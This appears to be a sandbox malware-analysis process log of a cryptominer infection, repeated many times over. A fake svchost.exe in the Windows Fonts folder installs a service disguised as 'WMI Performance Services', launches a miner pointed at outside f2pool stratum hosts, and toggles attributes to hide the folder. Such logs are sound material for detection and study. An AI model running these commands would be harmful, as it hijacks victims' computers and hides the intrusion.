c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:4968

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:376

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:3240

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:4900

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:428

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6700

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:5924

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:3612

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
- Executes dropped EXE
PID:1492

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5244

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
- Executes dropped EXE
PID:2280

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:4696

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:5496

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6872

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:1524

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:6812

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
- Executes dropped EXE
PID:6020

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:4016

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:7052

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:500

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5628

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Executes dropped EXE
- Drops file in Windows directory
- Views/modifies file attributes
PID:3856

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2644

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Executes dropped EXE
PID:4964

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:212

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
- Executes dropped EXE
PID:3076

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:4916

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:7004

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6140

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:5180

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5868

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
- Drops file in Windows directory
PID:6200

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4624

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:5556

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:6160

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:6776

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
- Executes dropped EXE
PID:4904

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6524

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:6876

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5620

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:5568

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
- Executes dropped EXE
PID:2456

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:5408

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:760

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:6512

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:4056

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:5288

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:5276

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:916

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:6232

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:6840

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:5176

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:1800

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5976

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4544

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3960

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:4604

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:4856

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:4996

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:6756

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
- Drops file in Windows directory
PID:4308

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:2800

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:3744

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:4424

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6416

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:4408

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4396

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:4564

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:4496

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5600

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5632

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:1652

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:5508

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6732

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:6152

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:6996

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:6888

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5444

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5664

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:4844

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:3296

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:7056

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4268

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:5536

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:748

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:4760

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:676

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5356

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:4220

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6116

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:6052

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:4904

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:5384

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
- Drops file in Windows directory
PID:5156

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:1136

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:4532

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:1656

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5240

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3288

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6016

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:5372

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:5560

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:4320

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1252

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3460

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:6124

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
- Executes dropped EXE
PID:4976

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:3176

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:6048

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
- Executes dropped EXE
PID:3852

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:6884

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5164

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4088

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:5544

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:2132

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:6460

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:6500

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6368

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:5464

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:6796

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:5708

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:2332

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:3896

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5540

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:3368

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:5588

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:2256

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3488

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:6680

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:500

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:392

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
- Drops file in Windows directory
PID:6208

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:6616

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:584

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
- Drops file in Windows directory
PID:5956

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6472

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5428

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2272

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:6032

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:2268

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5084

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:944

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6060

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:4012

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4896

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:816

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:4908

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:5628

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:1792

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:1004

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:1580

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2644

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3984

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4380

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:5472

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:3900

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:6436

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:6964

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:7032

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:2496

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:4944

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
- Executes dropped EXE
PID:4236

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4668

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:6784

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:3968

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
- Drops file in Windows directory
PID:6980

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6580

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:6240

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:496

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
- Executes dropped EXE
PID:5380

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:6596

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:6376

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:4948

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5920

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
- Drops file in Windows directory
PID:6568

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:3688

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:2448

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6188

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:5356

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:2764

\??\c:\windows\Fonts\svchost.exe
